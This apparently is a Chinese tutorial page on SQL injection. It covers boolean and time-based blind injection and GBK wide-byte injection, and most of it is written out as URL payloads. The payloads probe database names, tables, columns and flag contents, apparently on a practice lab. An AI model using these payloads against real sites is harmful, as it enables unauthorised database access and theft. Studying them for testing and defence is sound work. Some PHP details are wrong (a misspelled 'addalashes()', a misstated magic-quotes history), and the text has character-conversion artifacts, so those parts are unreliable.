腳本之家服務(wù)器常用軟件

快捷導(dǎo)航

軟件下載

android MAC 驅(qū)動下載字體下載 DLL

源碼下載

PHP ASP.NET ASP JSP

軟件編程

C# JAVA C 語言 Delphi Android

網(wǎng)絡(luò)編程

PHP ASP.NET ASP JavaScript

在線工具

CSS格式化 JS格式化 Html轉(zhuǎn)化為Js

數(shù)據(jù)庫

MYSQL MSSQL oracle DB2 MARIADB

CMS

PHPCMS DEDECMS 帝國CMS WordPress

常用工具

PHP開發(fā)工具 python Photoshop 必備軟件

SQL注入篇學習之盲注/寬字節(jié)注入

更新時間：2022年03月02日 11:20:34 作者：poggioxay

盲注是注入的一種,指的是在不知道數(shù)據(jù)庫返回值的情況下對數(shù)據(jù)中的內(nèi)容進行猜測,實施SQL注入,下面這篇文章主要給大家介紹了關(guān)于SQL注入篇之盲注/寬字節(jié)注入的相關(guān)資料,需要的朋友可以參考下

盲注

有時目標存在注入,但在頁面上沒有任何回顯,此時，我們需要利用一些方法進行判斷或者嘗試得到數(shù)據(jù)，這個過程稱之為盲注。

時間盲注其實和布爾盲注其實沒有什么太大的區(qū)別，只不過是一個依靠頁面是否正常判斷，一個是否延時判斷，在操作上其實也差不多，只不過時間注入多一個if()

布爾盲注

布爾很明顯就是true和false，也就是說它只會根據(jù)信息返回true和false，也就是沒有了之前的報錯信息。

時間盲注

界面返回值只有一種true，無論輸入任何值，返回情況都會按照正常的來處理。加入特定的時間函數(shù)，通過查看web頁面返回的時間差來判斷注入的語句是否正確。

盲注函數(shù)

length() 函數(shù) 返回字符串的長度

?id=1 and length(database())>1

substr() 截取字符串 , 從第一位截取一個

?id=1 and substr(database(),1,1)='k'

ord()/ascii() 返回字符的ascii碼

?id=1 and ord(substr(database(),1,1))=107

limit 0,1 顯示第一條

substr(截取的內(nèi)容,截取的位數(shù),截取的個數(shù))

substr(database(),1,1) 顯示第一位字符

時間型：sleep(n) 將程序掛起一段時間，n為n秒

if(expr1,expr2,expr3) 判斷語句如果第一個語句正確就執(zhí)行第二個語句，如果錯誤執(zhí)行第三個語句

?id=1' and if(length(database())=8,1,sleep(5))-- +

演示語句

猜數(shù)據(jù)庫的長度；
?id=1 and (length(database()))>11#

猜測數(shù)據(jù)庫的庫名：
?id=1 and ascii(substr(database(),1,1))>1#

猜表名（示例為查詢第一個表名）
and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6     //注意括號問題

and substr((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 0,1),1,1)='l'     

猜第一個字段名第一個字符：
and substr((select column_name from information_schema.columns where table_name='loflag' limit 0,1),1,1)='i'  

猜第一個字段名第二個字符：
and substr((select column_name from information_schema.columns where table_name='loflag' limit 0,1),2,1)='i'  


猜第二個字段名：
and substr((select column_name from information_schema.columns where table_name='loflag' limit 1,1),2,1)='l'#  

猜字段中的內(nèi)容：
and (ascii(substr(( select flaglo from loflag limit 0,1),1,1)))=122

時間盲注猜測數(shù)據(jù)庫的長度:
?id=1" and if(length(database())=12,sleep(5),1) -- +

猜測數(shù)據(jù)庫的庫名:
if(ascii(substr(database(),1,1))>120,0,sleep(10)) --+

猜測數(shù)據(jù)庫中表的長度：
?id=1" and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6,sleep(5),1) -- +

猜測數(shù)據(jù)庫中的表名：
?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=120,sleep(5),1) -- +

猜測表中的字段名的長度：
?id=1" and if(length((select column_name from information_schema.columns where table_schema=database() and table_name='loflag' limit 0,1))=2,sleep(5),111) -- +

猜測表中的字段名：
?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='loflag' limit 0,1),1,1))=73,sleep(5),111) -- +

猜測字段中內(nèi)容的長度：
?id=1" and if(length((select flaglo from loflag limit 0,1))=111,sleep(5),111) -- +

猜測字段中的內(nèi)容：
?id=1" and if((ascii(substr((select flaglo from loflag limit 0,1),1,1)))=120,sleep(5),111) -- +

burp抓包演示

先判斷長度，再判斷內(nèi)容

寬字節(jié)注入

php魔術(shù)函數(shù)

magic_quotes_gpc（魔術(shù)引號開關(guān)）——> 防御sql注入
magic_quotes_gpc函數(shù)在php中的作用是判斷解析用戶提交的數(shù)據(jù)，如包括有：post、get、cookie過來的數(shù)據(jù)增加轉(zhuǎn)義字符“\”，以確保這些數(shù)據(jù)不會引起程序，特別是數(shù)據(jù)庫語句因為特殊字符引起的污染而出現(xiàn)致命的錯誤，防止注入使其無法閉合。
單引號（’）、雙引號（”）、反斜線（\）等字符都會被加上反斜線

開啟方式

php在版本5.4開始將魔術(shù)引號的設(shè)置轉(zhuǎn)化為特定函數(shù)addalashes()使用，$b = addcslashes($_REQUEST[8]);不在配置文件中打開【原因是將安全編碼交給了用戶自己，避免用戶過度依賴造成安全隱患】，或者在php.ini中修改。

開啟效果

作用

當PHP的傳參中有特殊字符就會再前面加轉(zhuǎn)義字符’\’,來做一定的過濾

繞過方法

單引號和雙引號內(nèi)的一切都是字符串，那我們輸入的東西如果不能閉合掉單引號和雙引號，我們的輸入就不會當作代碼執(zhí)行，就無法產(chǎn)生SQL注入，那我們該怎么辦？

不需要閉合
仔細查看作用域（POST、GET、COOKIE），$_SERVER就在作用域之外。
寬字節(jié)注入

寬字節(jié)注入

盡管現(xiàn)在呼吁所有的程序都使用unicode編碼，所有的網(wǎng)站都使用utf-8編碼，來一個統(tǒng)一的國際規(guī)范。但仍然有很多，包括國內(nèi)及國外（特別是非英語國家）的一些cms，仍然使用著自己國家的一套編碼，比如我國的gbk、gb2312，作為自己默認的編碼類型。也有一些cms為了考慮老用戶，推出了gbk和utf-8兩個版本（例如:dedecms）
我們就以gbk字符編碼為例，拉開帷幕。GBK【雙字符編碼】全稱《漢字內(nèi)碼擴展規(guī)范》,gbk是一種多字符編碼【多個字符組在一起成為一個字】。他使用了雙字節(jié)編碼方案，因為雙字節(jié)編碼所以gbk編碼漢字，占用2個字節(jié)。一個utf-8編碼的漢字，占用3個字節(jié)。

核心：傳一個字符將反斜杠吃掉成為漢字
數(shù)據(jù)庫使用GBK編碼可能存在寬字節(jié)注入
MySql的編碼設(shè)置：SET NAMES 'gbk'或是 SET character_set_client =gbk
寬字節(jié)SQL注入就是PHP發(fā)送請求到MySql時使用了語句
SET NAMES 'gbk' 或是SET character_set_client =gbk 進行了一次編碼，但是又由于一些不經(jīng)意的字符集轉(zhuǎn)換導(dǎo)致了寬字節(jié)注入。
%df \、%9c \ ——>漢字
繞過其中的單引號等字符，除了采用嵌套法?id=1%df' union select 1,2, column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=database() limit 0,1)-- +
也可以采用十六進制標識法?id=1%df' union select 1,2, column_name from information_schema.columns where table_name=0x6368696e615f666c6167 limit 1,1-- +
寬字節(jié)注入可以直接傳入漢字